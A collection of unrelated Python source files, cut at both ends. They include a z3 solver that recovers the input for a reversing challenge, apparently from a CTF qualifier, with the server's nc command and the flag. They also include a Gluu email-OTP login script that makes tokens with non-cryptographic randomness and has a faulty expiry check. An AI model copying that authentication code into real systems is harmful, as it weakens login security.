params = np.vstack((params, parameters))
priors_abc = np.vstack((priors_abc, prior_sample))
# Normalise the weights.
weights_arr2 = weights_arr / np.sum(weights_arr)
weights_arr3 = np.reshape(weights_arr2, (nn, 1))
# Return the results: distance, accepted parameters, weights and total number of runs.
return [np.hstack((np.reshape(results, (nn, 1)), params, weights_arr3)), epsilon, truns]
# Sample size for the ABC-SMC.
sample_size = 10000
# Number of iterations to run.
num_iters = 16
# To generate the first value of epsilon.
eps1 = generate_eps1(sample_size,1)
Epsilons = [eps1]
# Run the first iteration of ABC-SMC.
first_output = iteration1(sample_size)
ABC_runs = [first_output[0]]
# Run all the other iterations of ABC-SMC.
for iterat in range(num_iters):
run = other_iterations(sample_size,iterat)
ABC_runs.append(run[0])
Epsilons.append(run[1])
# Save the results as a text file.
np.savetxt('Posterior_F5_multi_stage.txt', ABC_runs[num_iters])
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import struct
import z3
def s264(s):
return struct.unpack('<Q', s)[0]
def to8(i):
return i & 0xff
def to16(i):
return i & 0xffff
def to32(i):
return i & 0xffffffff
################################################################################
def f_a(a1, a2):
return a1 ^ a2
def f_b(a1, a2, a3):
return (to8(z3.LShR(a1, 8 * a2)) << 8 * a3) | (
to8(z3.LShR(a1, 8 * a3)) << 8 * a2) | ~(255 << 8 * a2) & ~(255 << 8 * a3) & a1
def f_c(a1, a2):
return (a1 << (a2 & 0x3F)) | (z3.LShR(a1, (64 - (a2 & 0x3F))))
def f_d(a1, a2):
return (a1 << (64 - (a2 & 0x3F))) | z3.LShR(a1, (a2 & 0x3F))
def f_e(a1):
return (a1 << 56) ^ a1 & 0xFF00000000000000 | z3.LShR((to16(a1) & 0xFF00), 8) ^ to8(a1) | z3.LShR(
(a1 & 0xFF0000), 8) ^ to16(a1) & 0xFF00 | z3.LShR((to32(a1) & 0xFF000000), 8) ^ a1 & 0xFF0000 | z3.LShR(
(a1 & 0xFF00000000), 8) ^ to32(a1) & 0xFF000000 | z3.LShR(
(a1 & 0xFF0000000000), 8) ^ a1 & 0xFF00000000 | z3.LShR(
(a1 & 0xFF000000000000), 8) ^ a1 & 0xFF0000000000 | z3.LShR(
(a1 & 0xFF00000000000000), 8) ^ a1 & 0xFF000000000000
def f_f(a1):
return z3.LShR((a1 & 0xFF00000000000000), 8) | z3.LShR((a1 & 0xFF000000000000), 40) | z3.LShR(
(a1 & 0xFF0000000000), 40) | z3.LShR((a1 & 0xFF00000000), 16) | ((to32(a1) & 0xFF000000) << 16) | (
(a1 & 0xFF0000) << 40) | ((to16(a1) & 0xFF00) << 24) | (to16(a1) << 24)
def check1(i):
v1 = f_a(i, 3861390726976975706)
v2 = f_b(v1, 2, 0)
v3 = f_a(v2, 0x89FDAF6604952DF1)
v4 = f_a(v3, 0xE9F30F0CE704876A)
v5 = f_b(v4, 2, 3)
v6 = f_a(v5, 0xBDC5026D3C0B56E6)
v7 = f_c(v6, 16)
v8 = f_c(v7, 35)
v9 = f_d(v8, 19)
v10 = f_e(v9)
v11 = f_c(v10, 36)
v12 = f_d(v11, 40)
v13 = f_b(v12, 1, 0)
v14 = f_a(v13, 6765015749217278743)
v15 = f_f(v14)
v16 = f_f(v15)
v17 = f_b(v16, 2, 1)
v18 = f_a(v17, 7686949068708848117)
v19 = f_b(v18, 3, 0)
v20 = f_f(v19)
v21 = f_a(v20, 6401935715922169987)
v22 = f_d(v21, 22)
v23 = f_e(v22)
v24 = f_a(v23, 5166993816397978483)
v25 = f_e(v24)
v26 = f_e(v25)
v27 = f_b(v26, 6, 5)
v28 = f_c(v27, 59)
v29 = f_b(v28, 5, 2)
v30 = f_b(v29, 2, 3)
v31 = f_c(v30, 12)
v32 = f_a(v31, 0xAD25307F8E364B17)
v33 = f_a(v32, 5234710379464860866)
v34 = f_c(v33, 6)
v35 = f_b(v34, 6, 5)
v36 = f_d(v35, 11)
v37 = f_f(v36)
v38 = f_a(v37, 0x869365DB4C9F3CB6)
v39 = f_f(v38)
v40 = f_d(v39, 2)
v41 = f_a(v40, 4649309708712362587)
v42 = f_c(v41, 35)
v43 = f_c(v42, 9)
v44 = f_e(v43)
v45 = f_c(v44, 7)
v46 = f_c(v45, 38)
v47 = f_e(v46)
v48 = f_a(v47, 0xDEF2D72447EF4E1B)
v49 = f_f(v48)
v50 = f_f(v49)
v51 = f_b(v50, 2, 7)
v52 = f_d(v51, 51)
v53 = f_f(v52)
v54 = f_d(v53, 19)
v55 = f_a(v54, 0x95DE49591A44EE21)
v56 = f_e(v55)
v57 = f_f(v56)
return f_d(v57, 16)
def check2(i):
v1 = f_c(i, 22)
v2 = f_f(v1)
v3 = f_b(v2, 4, 1)
v4 = f_f(v3)
v5 = f_e(v4)
v6 = f_c(v5, 35)
v7 = f_b(v6, 2, 6)
v8 = f_a(v7, 0x80A9EA4F90944FEA)
v9 = f_c(v8, 3)
v10 = f_b(v9, 0, 1)
v11 = f_b(v10, 1, 2)
v12 = f_f(v11)
v13 = f_e(v12)
v14 = f_b(v13, 5, 1)
v15 = f_d(v14, 24)
v16 = f_c(v15, 39)
v17 = f_b(v16, 2, 4)
v18 = f_a(v17, 7462025471038891063)
v19 = f_b(v18, 4, 3)
v20 = f_b(v19, 0, 7)
v21 = f_c(v20, 62)
v22 = f_f(v21)
v23 = f_b(v22, 7, 6)
v24 = f_b(v23, 2, 6)
v25 = f_f(v24)
v26 = f_e(v25)
v27 = f_b(v26, 5, 2)
v28 = f_e(v27)
v29 = f_b(v28, 1, 7)
v30 = f_a(v29, 4749710960471120103)
v31 = f_f(v30)
v32 = f_e(v31)
v33 = f_b(v32, 1, 4)
v34 = f_c(v33, 10)
v35 = f_f(v34)
v36 = f_f(v35)
v37 = f_d(v36, 24)
v38 = f_b(v37, 0, 4)
v39 = f_d(v38, 61)
v40 = f_b(v39, 3, 4)
v41 = f_d(v40, 35)
v42 = f_c(v41, 55)
v43 = f_c(v42, 34)
v44 = f_e(v43)
v45 = f_e(v44)
v46 = f_d(v45, 23)
v47 = f_c(v46, 59)
v48 = f_d(v47, 20)
v49 = f_c(v48, 28)
v50 = f_a(v49, 0xC26499379C0927CD)
v51 = f_e(v50)
return f_d(v51, 13)
def check3(i):
v1 = f_c(i, 18)
v2 = f_c(v1, 29)
v3 = f_b(v2, 5, 3)
v4 = f_b(v3, 0, 7)
v5 = f_c(v4, 18)
v6 = f_a(v5, 0xC9AB604BB92038AD)
v7 = f_d(v6, 33)
v8 = f_b(v7, 0, 4)
v9 = f_e(v8)
v10 = f_b(v9, 6, 2)
v11 = f_d(v10, 13)
v12 = f_d(v11, 20)
v13 = f_a(v12, 6368261268581873766)
v14 = f_e(v13)
v15 = f_f(v14)
v16 = f_d(v15, 46)
v17 = f_b(v16, 2, 3)
v18 = f_d(v17, 44)
v19 = f_d(v18, 3)
v20 = f_b(v19, 4, 3)
v21 = f_e(v20)
v22 = f_b(v21, 7, 6)
v23 = f_d(v22, 59)
v24 = f_d(v23, 38)
v25 = f_f(v24)
v26 = f_b(v25, 1, 5)
v27 = f_f(v26)
v28 = f_c(v27, 27)
v29 = f_a(v28, 0xBED577A97EB7966F)
v30 = f_d(v29, 14)
v31 = f_c(v30, 7)
v32 = f_c(v31, 18)
v33 = f_c(v32, 57)
v34 = f_a(v33, 0xB44427BE7889C31B)
v35 = f_a(v34, 929788566303591270)
v36 = f_a(v35, 0x94B1608ADB7F7221)
v37 = f_a(v36, 0x85BEF139817EBC4A)
v38 = f_b(v37, 5, 1)
v39 = f_c(v38, 20)
v40 = f_c(v39, 24)
v41 = f_d(v40, 46)
v42 = f_d(v41, 13)
v43 = f_a(v42, 0xC95E5C35034B9775)
v44 = f_c(v43, 7)
v45 = f_a(v44, 641209893495219690)
v46 = f_a(v45, 6473287570272602621)
v47 = f_e(v46)
v48 = f_b(v47, 4, 7)
v49 = f_e(v48)
v50 = f_d(v49, 22)
v51 = f_d(v50, 50)
return f_e(v51)
def check4(i):
v1 = f_b(i, 1, 7)
v2 = f_c(v1, 6)
v3 = f_b(v2, 2, 5)
v4 = f_d(v3, 57)
v5 = f_a(v4, 902179681853661902)
v6 = f_b(v5, 5, 1)
v7 = f_c(v6, 1)
v8 = f_e(v7)
v9 = f_a(v8, 6764338754798371998)
v10 = f_e(v9)
v11 = f_c(v10, 6)
v12 = f_e(v11)
v13 = f_c(v12, 33)
v14 = f_d(v13, 25)
v15 = f_e(v14)
v16 = f_a(v15, 762415417889401952)
v17 = f_b(v16, 6, 2)
v18 = f_e(v17)
v19 = f_a(v18, -3724318961155856981)
v20 = f_a(v19, -8646321147571282756)
v21 = f_e(v20)
v22 = f_a(v21, -8802313616937474543)
v23 = f_d(v22, 8)
v24 = f_d(v23, 43)
v25 = f_a(v24, 7150187182015826299)
v26 = f_b(v25, 3, 1)
v27 = f_b(v26, 5, 7)
v28 = f_f(v27)
v29 = f_e(v28)
v30 = f_d(v29, 59)
v31 = f_d(v30, 10)
v32 = f_e(v31)
v33 = f_b(v32, 2, 1)
v34 = f_b(v33, 7, 2)
v35 = f_e(v34)
v36 = f_a(v35, 7246290916701591349)
v37 = f_a(v36, -243320396905423181)
v38 = f_a(v37, -43605043069428557)
v39 = f_b(v38, 2, 4)
v40 = f_b(v39, 5, 4)
v41 = f_d(v40, 11)
v42 = f_e(v41)
v43 = f_c(v42, 39)
v44 = f_f(v43)
v45 = f_e(v44)
v46 = f_a(v45, -4064264580452746468)
v47 = f_f(v46)
v48 = f_e(v47)
v49 = f_c(v48, 35)
v50 = f_b(v49, 3, 5)
v51 = f_e(v50)
v52 = f_f(v51)
return f_e(v52)
s = z3.Solver()
i1 = z3.BitVec('i1', 64)
i2 = z3.BitVec('i2', 64)
i3 = z3.BitVec('i3', 64)
i4 = z3.BitVec('i4', 64)
for v in [i1, i2, i3, i4]:
for i in range(8):
mask = 0xff << (i * 8)
s.add(z3.Or(v & mask == (32 << (i * 8)), v & mask > (0x40 << (i * 8))))
s.add(v & mask <= (0x7a << (i * 8)))
s.add(v & mask != (91 << (i * 8)))
s.add(v & mask != (92 << (i * 8)))
s.add(v & mask != (93 << (i * 8)))
s.add(v & mask != (94 << (i * 8)))
s.add(v & mask != (96 << (i * 8)))
r1 = check1(i1)
r2 = check2(i2)
r3 = check3(i3)
r4 = check4(i4)
s.add(r1 ^ r2 ^ r3 ^ r4 == 0xB101124831C0110A)
assert s.check() == z3.sat
model = s.model()
print repr(''.join(struct.pack('<Q', model[v].as_long()) for v in [i1, i2, i3, i4]))
# ' V YYVZj iyVFvxPDalGHWT aLw YT'
# $ nc amadhj_b76a229964d83e06b7978d0237d4d2b0.quals.shallweplayaga.me 4567
# V YYVZj iyVFvxPDalGHWT aLw YT
# The flag is: Da robats took err jerbs.
|
from django.contrib import admin
# Register your models here.
from apps.models import App
import hashlib
@admin.register(App)
class ApisAppAdmin(admin.ModelAdmin):
fields = ['name', 'application', 'category', 'url', 'publish_date', 'desc']
# exclude = ['appid']
def save_model(self, request, obj, form, change):
src = obj.category + obj.application
appid = hashlib.md5(src.encode('utf8')).hexdigest()
obj.appid = appid
super().save_model(request, obj, form, change)
|
from org.gluu.oxauth.service import AuthenticationService
from org.gluu.oxauth.service import UserService
from org.gluu.oxauth.auth import Authenticator
from org.gluu.oxauth.security import Identity
from org.gluu.model.custom.script.type.auth import PersonAuthenticationType
from org.gluu.service.cdi.util import CdiUtil
from org.gluu.util import StringHelper
from org.gluu.oxauth.util import ServerUtil
from org.gluu.oxauth.service.common import ConfigurationService
from org.gluu.oxauth.service.common import EncryptionService
from org.gluu.jsf2.message import FacesMessages
from javax.faces.application import FacesMessage
from org.gluu.persist.exception import AuthenticationException
from datetime import datetime, timedelta
from java.util import GregorianCalendar, TimeZone
from java.io import File
from java.io import FileInputStream
from java.util import Enumeration, Properties
#dealing with smtp server
from java.security import Security
from javax.mail.internet import MimeMessage, InternetAddress
from javax.mail import Session, Message, Transport
from java.util import Arrays
import random
import string
import re
import urllib
import java
try:
import json
except ImportError:
import simplejson as json
class EmailValidator():
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
def check(self, email):
if(re.search(self.regex,email)):
print "EmailOTP. - %s is a valid email format" % email
return True
else:
print "EmailOTP. - %s is an invalid email format" % email
return False
class Token:
#class that deals with string token
def generateToken(self,lent):
rand1="1234567890123456789123456789"
rand2="9876543210123456789123456789"
first = int(rand1[:int(lent)])
first1 = int(rand2[:int(lent)])
token = random.randint(first, first1)
return token
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
def init(self, customScript, configurationAttributes):
print "EmailOTP. - Initialized successfully"
return True
def destroy(self, configurationAttributes):
print "EmailOTP. - Destroyed successfully"
return True
def getApiVersion(self):
return 11
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAuthenticationMethodClaims(self, configurationAttributes):
return None
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
print "Email 2FA - Authenticate for step %s" % ( step)
authenticationService = CdiUtil.bean(AuthenticationService)
identity = CdiUtil.bean(Identity)
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
subject = "Gluu Authentication Token"
session_attributes = identity.getSessionId().getSessionAttributes()
multipleEmails = session_attributes.get("emailIds")
if step == 1:
try:
# Check if user authenticated already in another custom script
user2 = authenticationService.getAuthenticatedUser()
if user2 == None:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if (StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password)):
userService = CdiUtil.bean(UserService)
logged_in = authenticationService.authenticate(user_name, user_password)
if (not logged_in):
return False
user2 = authenticationService.getAuthenticatedUser()
if user2 is not None:
uid = user2.getAttribute("uid")
lent = configurationAttributes.get("token_length").getValue2()
new_token = Token()
token = new_token.generateToken(lent)
body = "Here is your token: %s" % token
sender = EmailSender()
emailIds = user2.getAttribute("oxEmailAlternate")
print "emailIds : %s" % emailIds
data = json.loads(emailIds)
#Attempt to send message now if user has only one email id
if len(data['email-ids']) == 1:
email = data['email-ids'][0]
print "EmailOTP. email to - %s" % email['email']
sender.sendEmail( email['email'], subject, body)
else:
commaSeperatedEmailString = []
for email in data['email-ids']:
reciever_id = email['email']
print "EmailOTP. Email to - %s" % reciever_id
sender.sendEmail( reciever_id, subject, body)
commaSeperatedEmailString.append(self.getMaskedEmail(reciever_id))
identity.setWorkingParameter("emailIds", ",".join(commaSeperatedEmailString))
otptime1 = datetime.now()
tess = str(otptime1)
listee = tess.split(':')
identity.setWorkingParameter("sentmin", listee[1])
identity.setWorkingParameter("token", token)
return True
else:
print "EmailOTP. oxEmailAlternate not present"
return False
except AuthenticationException as err:
print err
return False
else:
#Means the selection email page was used
if step == 2 and multipleEmails != None :
token = identity.getWorkingParameter("token")
print requestParameters
idx = ServerUtil.getFirstValue(requestParameters, "OtpEmailLoginForm:indexOfEmail")
if idx != None and token != None:
sendToEmail = multipleEmails.split(",")[int(idx)]
print "EmailOtp. Sending email to : %s " % sendToEmail
body = "Here is your token: %s" % token
sender = EmailSender()
sender.sendEmail( sendToEmail, subject, body)
return True
else:
print "EmailOTP. Something wrong with index or token"
return False
input_token = ServerUtil.getFirstValue(requestParameters, "OtpEmailLoginForm:passcode")
print "EmailOTP. - Token inputed by user is %s" % input_token
token = str(identity.getWorkingParameter("token"))
min11 = int(identity.getWorkingParameter("sentmin"))
nww = datetime.now()
te = str(nww)
listew = te.split(':')
curtime = int(listew[1])
token_lifetime = int(configurationAttributes.get("token_lifetime").getValue2())
if ((min11<= 60) and (min11>= 50)):
if ((curtime>=50) and (curtime<=60)):
timediff1 = curtime - min11
if timediff1>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
elif ((curtime>=0) or (curtime<=10)):
timediff1 = 60 - min11
timediff1 = timediff1 + curtime
if timediff1>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
if ((min11>=0) and (min11<=60) and (curtime>=0) and (curtime<=60)):
timediff2 = curtime - min11
if timediff2>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
# compares token sent and token entered by user
if input_token == token:
print "Email 2FA - token entered correctly"
identity.setWorkingParameter("token_valid", True)
return True
else:
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
facesMessages.clear()
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Wrong code entered")
print "EmailOTP. Wrong code entered"
return False
def prepareForStep(self, configurationAttributes, requestParameters, step):
print "EmailOTP. - Preparing for step %s" % step
return True
def getExtraParametersForStep(self, configurationAttributes, step):
return Arrays.asList("token","emailIds","token_valid","sentmin")
def getCountAuthenticationSteps(self, configurationAttributes):
print "EmailOTP. getCountAuthenticationSteps called"
if CdiUtil.bean(Identity).getWorkingParameter("emailIds") == None:
return 2
else:
return 3
def getPageForStep(self, configurationAttributes, step):
print "EmailOTP. getPageForStep called %s" % step
defPage = "/casa/otp_email.xhtml"
if step == 2:
if CdiUtil.bean(Identity).getWorkingParameter("emailIds") == None:
return defPage
else:
return "/casa/otp_email_prompt.xhtml"
elif step == 3:
return defPage
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def logout(self, configurationAttributes, requestParameters):
return True
def hasEnrollments(self, configurationAttributes, user):
values = user.getAttributeValues("oxEmailAlternate")
if values != None:
return True
else:
return False
def getMaskedEmail (self, emailid):
regex = r"(?<=.)[^@\n](?=[^@\n]*?@)|(?:(?<=@.)|(?!^)\G(?=[^@\n]*$)).(?=.*\.)"
subst = "*"
result = re.sub(regex, subst, emailid, 0, re.MULTILINE)
if result:
print (result)
return result
class EmailSender():
#class that sends e-mail through smtp
def getSmtpConfig(self):
smtp_config = None
smtpconfig = CdiUtil.bean(ConfigurationService).getConfiguration().getSmtpConfiguration()
if smtpconfig is None:
print "Sign Email - SMTP CONFIG DOESN'T EXIST - Please configure"
else:
encryptionService = CdiUtil.bean(EncryptionService)
smtp_config = {
'host' : smtpconfig.getHost(),
'port' : smtpconfig.getPort(),
'user' : smtpconfig.getUserName(),
'from' : smtpconfig.getFromEmailAddress(),
'pwd_decrypted' : encryptionService.decrypt(smtpconfig.getPassword()),
'req_ssl' : smtpconfig.isRequiresSsl(),
'requires_authentication' : smtpconfig.isRequiresAuthentication(),
'server_trust' : smtpconfig.isServerTrust()
}
return smtp_config
def sendEmail(self, useremail, subject, messageText):
# server connection
smtpconfig = self.getSmtpConfig()
properties = Properties()
properties.setProperty("mail.smtp.host", smtpconfig['host'])
properties.setProperty("mail.smtp.port", str(smtpconfig['port']))
properties.setProperty("mail.smtp.starttls.enable", "true")
session = Session.getDefaultInstance(properties)
message = MimeMessage(session)
message.setFrom(InternetAddress(smtpconfig['from']))
message.addRecipient(Message.RecipientType.TO,InternetAddress(useremail))
message.setSubject(subject)
#message.setText(messageText)
message.setContent(messageText, "text/html")
transport = session.getTransport("smtp")
transport.connect(properties.get("mail.smtp.host"),int(properties.get("mail.smtp.port")), smtpconfig['user'], smtpconfig['pwd_decrypted'])
transport.sendMessage(message,message.getRecipients(Message.RecipientType.TO))
transport.close()
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Country, State
from api.serializers import StateSerializer
def states_url(country):
"""Return states By country URL"""
return reverse('api:state-list', args=[country])
def sample_country():
country = Country.objects.create(
name='Bangladesh',
latitude=23.6850,
longitude=90.3563,
code='BD'
)
return country
class PublicStatesApiTests(TestCase):
"""Test the publicly available states API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required for retrieving states"""
url = states_url(sample_country().name)
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
class PrivateStatesApiTests(TestCase):
"""Test the authorized country API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'test@gmail.com',
'test123345'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_states(self):
"""Test retrieving states"""
self.country = sample_country()
State.objects.create(
name='Dhaka',
country=self.country
)
State.objects.create(
name='Chattagram',
country=self.country
)
url = states_url(self.country.name)
res = self.client.get(url)
states = State.objects.filter(
country__name=self.country.name).order_by('-name')
serializer = StateSerializer(states, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
|
import json
import os
import pprint
history = {}
home = os.path.expanduser('~')
history_directory = home + "/.bash_history"
history_file = open(history_directory, 'r')
for command in history_file:
#sanitize command and split into arguments
command = command.strip("\n")
args = command.split(" ")
args = [arg for arg in args if arg != '']
command = args[0]
if len(args) > 1:
args = args[1:]
else:
args = ['']
if command in history:
history[command]["count"]+=1
else:
history[command] = {
"count": 1,
"args": {},
}
for arg in args:
if arg in history[command]["args"]:
history[command]["args"][arg]["count"]+=1
else:
history[command]["args"][arg] = {
"count": 1,
}
data = json.dumps(history)
print data
# pp = pprint.PrettyPrinter()
# pp.pprint(history)
|
import FWCore.ParameterSet.Config as cms
# File: RecHits.cfi
# Author: B. Scurlock
# Date: 03.04.2008
#
# Fill validation histograms for ECAL and HCAL RecHits.
ECALAnalyzer = cms.EDAnalyzer(
"ECALRecHitAnalyzer",
EBRecHitsLabel = cms.InputTag("ecalRecHit","EcalRecHitsEB"),
EERecHitsLabel = cms.InputTag("ecalRecHit","EcalRecHitsEE"),
Debug = cms.bool(False),
FineBinning = cms.untracked.bool(True),
FolderName = cms.untracked.string("JetMET/ECALRecHits")
)
HCALAnalyzer = cms.EDAnalyzer(
"HCALRecHitAnalyzer",
HORecHitsLabel = cms.InputTag("horeco"),
HBHERecHitsLabel = cms.InputTag("hbhereco"),
Debug = cms.bool(False),
HFRecHitsLabel = cms.InputTag("hfreco"),
FineBinning = cms.untracked.bool(True),
FolderName = cms.untracked.string("JetMET/HCALRecHits")
)
|
"""
"""
import pytest
class TestCommon(object):
storage = {}
@pytest.fixture()
def number(self, pytestconfig):
return int(pytestconfig.getoption('n'))
@pytest.fixture()
def text(self, pytestconfig):
return pytestconfig.getoption('t')
@pytest.fixture()
def number_doubled(self, number):
return number * 2
|
import logging
from zope.interface import implements
from twisted.internet import defer
from lbrynet.cryptstream.CryptBlob import CryptBlobInfo
from lbrynet.interfaces import IMetadataHandler
log = logging.getLogger(__name__)
class EncryptedFileMetadataHandler(object):
implements(IMetadataHandler)
def __init__(self, stream_hash, stream_info_manager, download_manager):
self.stream_hash = stream_hash
self.stream_info_manager = stream_info_manager
self.download_manager = download_manager
self._final_blob_num = None
######### IMetadataHandler #########
@defer.inlineCallbacks
def get_initial_blobs(self):
blob_infos = yield self.stream_info_manager.get_blobs_for_stream(self.stream_hash)
formatted_infos = self._format_initial_blobs_for_download_manager(blob_infos)
defer.returnValue(formatted_infos)
def final_blob_num(self):
return self._final_blob_num
######### internal calls #########
def _format_initial_blobs_for_download_manager(self, blob_infos):
infos = []
for i, (blob_hash, blob_num, iv, length) in enumerate(blob_infos):
if blob_hash is not None and length:
infos.append(CryptBlobInfo(blob_hash, blob_num, length, iv))
else:
if i != len(blob_infos) - 1:
raise Exception("Invalid stream terminator")
log.debug("Setting _final_blob_num to %s", str(blob_num - 1))
self._final_blob_num = blob_num - 1
return infos
|
import io
from PIL import Image, ImageTk
def get_img_data(site, maxsize=(500, 500), first=False):
"""
Generate image data using PIL
"""
image = Image.open(site)
image.thumbnail(maxsize)
if first: # tkinter is inactive the first time
bio = io.BytesIO()
image.save(bio, format="PNG")
del image
return bio.getvalue()
return ImageTk.PhotoImage(image)
|
# Add new commands in this file
# Also modify `__init__.py` to expose the methods in the package
from .utils import get
import json
from .config import Config
from random import sample
async def getUserInfo(handles):
"""
Refer: https://codeforces.com/apiHelp/methods#user.info
Fetches the user info of the given handles
Parameters
----------
handles: list<str>
List of handles of all users
Returns
-------
list
List of json objects contating user info for the handles
"""
methodName = 'user.info'
handleParams = 'handles=' + ';'.join(handles)
return await get(methodName, handleParams)
async def getContests(all=False):
"""
Refer: https://codeforces.com/apiHelp/methods#contest.list
Fetches information about all the future contests
Parameters
----------
all: bool
false: Only fetch official CF division contests
true: fetch all gymkhana contests as well
Returns
-------
Returns a list of Contest objects.
See Also: https://codeforces.com/apiHelp/objects#Contest
"""
methodName = 'contest.list'
methodParam = 'gym=' + str(all)
# GET the json request
allContests = (await get(methodName, methodParam))['result']
# Filter the response for only future contests
# define the filter clause lambda
clause = lambda x: x['phase'] == "BEFORE"
futureContests = list(filter(clause,allContests))
return futureContests
async def getProblem(tags, counts=2):
"""
Refer: https://codeforces.com/apiHelp/methods#problemset.problems
Fetches a list of all problems filtered by tags
Parameters
----------
tags: list
list of tags
Returns
-------
List of Problem objects
See Also: https://codeforces.com/apiHelp/objects#Problem
"""
methodName = "problemset.problems"
methodParams = "tags=" + ";".join(tags)
# Get the json request
problems = await get(methodName, methodParams)
# Only get a max-amount (N) of problems
# from the responce problemset
counts = min(counts, Config['MAX_PROBLEMS'])
allProblems = problems['result']['problems']
lenProblems = len(allProblems)
# randomly select the N problems from the problemset
randomProblemsIdxs = sample(range(lenProblems), counts)
sampledProblems = [allProblems[i] for i in randomProblemsIdxs]
return sampledProblems
# For Testing
async def test():
# Add debug/testing code here
# resp = await getUserInfo(['sam6134'])
# resp_question = await getProblem(["implementation", "dp"])
resp = await getContests()
print(json.dumps(resp, indent=3))
return
if __name__ == "__main__":
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(test())
|
from django.template import (Node, Variable, TemplateSyntaxError, Library)
try:
from django.template.base import render_value_in_context
except ImportError:
from django.template.base import _render_value_in_context as render_value_in_context
from phrase.compat import TOKEN_TEXT, TOKEN_VAR, is_string_type
from django.utils import translation
from django.conf import settings
from phrase.settings import template_string_if_valid
from phrase.utils import PhraseDelegate
class PhraseBlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None,
counter=None, message_context=None, trimmed=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
self.message_context = message_context
self.trimmed = trimmed
def render_token_list(self, tokens):
result = []
vars = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append('%%(%s)s' % token.contents)
vars.append(token.contents)
return ''.join(result), vars
def render(self, context, nested=False):
if self.message_context:
message_context = self.message_context.resolve(context)
else:
message_context = None
tmp_context = {}
for var, val in self.extra_context.items():
tmp_context[var] = val.resolve(context)
# Update() works like a push(), so corresponding context.pop() is at
# the end of function
context.update(tmp_context)
singular, vars = self.render_token_list(self.singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural, plural_vars = self.render_token_list(self.plural)
if message_context:
result = translation.npgettext(message_context, singular,
plural, count)
else:
result = translation.ungettext(singular, plural, count)
vars.extend(plural_vars)
else:
if message_context:
result = translation.pgettext(message_context, singular)
else:
# result = translation.ugettext(singular)
result = str(PhraseDelegate(singular, self.trimmed))
render_value = lambda v: render_value_in_context(
context.get(v, template_string_if_valid()), context)
data = dict([(v, render_value(v)) for v in vars])
context.pop()
# FIX
# try:
# result = result % data
# except (KeyError, ValueError):
# if nested:
# # Either string is malformed, or it's a bug
# raise TemplateSyntaxError("'blocktrans' is unable to format "
# "string returned by gettext: %r using %r" % (result, data))
# with translation.override(None):
# result = self.render(context, nested=True)
return result
class PhraseTranslateNode(Node):
def __init__(self, filter_expression, noop, asvar=None,
message_context=None, trimmed=None):
self.noop = noop
self.asvar = asvar
self.message_context = message_context
self.filter_expression = filter_expression
if is_string_type(self.filter_expression.var):
self.filter_expression.var = Variable("'%s'" %
self.filter_expression.var)
self.trimmed = trimmed
def render(self, context):
self.filter_expression.var.translate = not self.noop
if self.message_context:
self.filter_expression.var.message_context = (
self.message_context.resolve(context))
output = self.filter_expression.resolve(context)
value = render_value_in_context(output, context)
if self.asvar:
context[self.asvar] = str(PhraseDelegate(value, self.trimmed))
return ''
else:
return str(PhraseDelegate(self.filter_expression.var, self.trimmed))
|
from __future__ import annotations
class BroodError(Exception):
pass
class UnknownFormat(BroodError):
pass
|
import pytest
from porcupine import get_main_window
code = """\
with open(path) as f:
while True:
try:
line = f.readline().decode('utf-8')
except OSError:
break
print(repr(line))
print("foo")
"""
except_folded = """\
with open(path) as f:
while True:
try:
line = f.readline().decode('utf-8')
except OSError:
print(repr(line))
print("foo")
"""
while_folded = """\
with open(path) as f:
while True:
print("foo")
"""
# tkinter doesn't support -displaychars option of Text.get
def get_content(textwidget, include_elided):
if include_elided:
return textwidget.tk.eval(f'{textwidget} get 1.0 "end - 1 char"')
else:
return textwidget.tk.eval(f'{textwidget} get -displaychars 1.0 "end - 1 char"')
@pytest.fixture
def text(filetab):
text = filetab.textwidget
text.insert("1.0", code)
return text
def test_outermost(text):
text.mark_set("insert", "1.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == "with open(path) as f:\n"
def test_inner(text):
text.mark_set("insert", "2.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == while_folded
def test_leaving_blank_lines_behind(text):
text.mark_set("insert", "5.0")
get_main_window().event_generate("<<Menubar:Edit/Fold>>")
assert get_content(text, True) == code
assert get_content(text, False) == except_folded
# Make sure that when "..." is clicked, it does not leave an invisible character behind
def test_invisible_character_bug(text):
text.mark_set("insert", "5.0")
